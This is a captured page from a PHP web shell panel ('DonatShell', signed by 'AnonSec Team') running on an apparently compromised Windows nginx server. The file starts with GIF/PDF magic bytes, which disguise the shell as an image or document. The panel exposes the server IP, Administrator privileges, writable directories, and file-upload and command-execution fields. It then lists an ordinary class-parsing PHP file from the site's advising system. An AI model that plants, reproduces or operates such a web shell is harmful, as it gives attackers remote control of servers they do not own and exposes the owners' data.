GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Admin/Advising/ParseClasses/parse/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Admin/Advising/ParseClasses/parse/parse10.phpinc
<?
// Admin/Admin/Advising/ParseClasses/parse/parse00.phpinc
// Find department.

$d_O = d_O(); #d_On(); // Uncomment to DEBUG.
d_Line(basename(__FILE__),'a/');
d_Var($index.': $ln',$ln); d_Var('$lnAsize',$lnAsize); d_Var('$lnA',$lnA);

while ( $lnOK && !in_ln('<FONT SIZE=+1>') ) { get_ln(); } // Skip to '<FONT SIZE=+1>'

d_Var($index.': $ln',$ln); d_Var('$lnAsize',$lnAsize); d_Var('$lnA',$lnA);
$department = array();
$department['Name'] = explode('>',$lnA[1]);
$department['Name'] = $department['Name'][2];
for ( $i=2; $i<$lnAsize; $i++ ) {
	#d_Var("substr(\$lnA[$i],0,4)",substr($lnA[$i],0,4));
	if ( substr($lnA[$i],0,4) != '</B>' ) {
		$department['Name'] .= ' '.$lnA[$i];
	} else {
		break;
	}
}
$department['Name'] = trim($department['Name']);
d_Var("\$department['Name']",$department['Name']);
if ( $showParsing ) {
	$d_O = d_O(); d_On(); // Uncomment to DEBUG.
	d_Line($index.': Parsing '.$department['Name'].' classes.','le');
	if ( isset($d_O) && !$d_O ) d_Off();
}
$find_departmentCode = true;

set_state(20); // Find class line.

if ( isset($d_O) && !$d_O ) d_Off();
?>

Anon7 - 2022
AnonSec Team